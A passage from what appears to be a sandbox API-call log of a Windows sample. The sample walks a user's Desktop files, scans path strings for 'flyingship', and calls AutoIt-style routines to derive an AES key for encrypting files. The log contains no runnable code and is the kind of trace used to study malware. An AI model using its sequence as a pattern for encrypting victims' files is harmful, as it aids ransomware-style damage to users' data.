Xz5NyPYF_.flv", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa554300, ftCreationTime.dwHighDateTime=0x1d5e54b, ftLastAccessTime.dwLowDateTime=0xd5e4b850, ftLastAccessTime.dwHighDateTime=0x1d5e3e5, ftLastWriteTime.dwLowDateTime=0xd5e4b850, ftLastWriteTime.dwHighDateTime=0x1d5e3e5, nFileSizeHigh=0x0, nFileSizeLow=0x329b, dwReserved0=0x0, dwReserved1=0x657690, cFileName="BhG Xz5NyPYF_.flv", cAlternateFileName="BHGXZ5~1.FLV")) returned 0x6b89b8 [0075.030] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0075.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HNgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NgAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gAEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AEohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ohzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hzwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zwnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wnBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nBTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BTD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TD\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BhG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hG Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xz5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NyPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yPYF_.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.032] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0075.032] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0075.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0075.033] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv", lpFindFileData=0x61e870 | out: lpFindFileData=0x61e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa554300, ftCreationTime.dwHighDateTime=0x1d5e54b, ftLastAccessTime.dwLowDateTime=0xd5e4b850, ftLastAccessTime.dwHighDateTime=0x1d5e3e5, ftLastWriteTime.dwLowDateTime=0xd5e4b850, ftLastWriteTime.dwHighDateTime=0x1d5e3e5, nFileSizeHigh=0x0, nFileSizeLow=0x329b, dwReserved0=0x61e9c0, dwReserved1=0x657690, cFileName="BhG Xz5NyPYF_.flv", cAlternateFileName="BHGXZ5~1.FLV")) returned 0x6b8b38 [0075.033] FindClose (in: hFindFile=0x6b8b38 | out: hFindFile=0x6b8b38) returned 1 [0075.033] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.033] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.033] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77710000 [0075.033] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0075.033] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.033] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.033] CryptAcquireContextA (in: phProv=0x61e550, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x61e550*=0x696ad0) returned 1 [0075.034] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0075.034] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.035] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0075.035] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.035] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.035] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.035] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.035] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.035] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.035] CryptCreateHash (in: hProv=0x696ad0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x61e2c0 | out: phHash=0x61e2c0) returned 1 [0075.035] CharLowerBuffW (in: lpsz="byte[22]", cchLength=0x8 | out: lpsz="byte[22]") returned 0x8 [0075.035] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.035] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.035] CryptHashData (hHash=0x6b89f8, pbData=0x6f9728, dwDataLen=0x16, dwFlags=0x1) returned 1 [0075.035] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.036] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.036] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.036] CryptDeriveKey (in: hProv=0x696ad0, Algid=0x660e, hBaseData=0x6b89f8, dwFlags=0x1, phKey=0x61e2c0 | out: phKey=0x61e2c0*=0x6b8af8) returned 1 [0075.036] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0075.036] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.036] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0075.036] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0075.036] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0075.036] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e348 [0075.036] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0075.036] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e348 | out: hHeap=0x650000) returned 1 [0075.036] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.036] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0075.036] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0075.036] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e348 [0075.036] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.036] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0075.036] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.036] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.036] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e348 | out: hHeap=0x650000) returned 1 [0075.036] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e348 [0075.036] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.036] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0075.036] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0075.036] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0075.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.037] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.037] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0075.037] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0075.037] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0075.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0075.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0075.037] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0075.037] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0075.037] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0075.037] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0075.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0075.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0075.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0075.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68def0 | out: hHeap=0x650000) returned 1 [0075.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0075.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0075.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0075.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0075.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0075.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0075.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0075.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.037] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0075.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0075.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0075.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0075.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0075.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0075.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0075.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0075.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0075.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0075.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0075.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b450 | out: 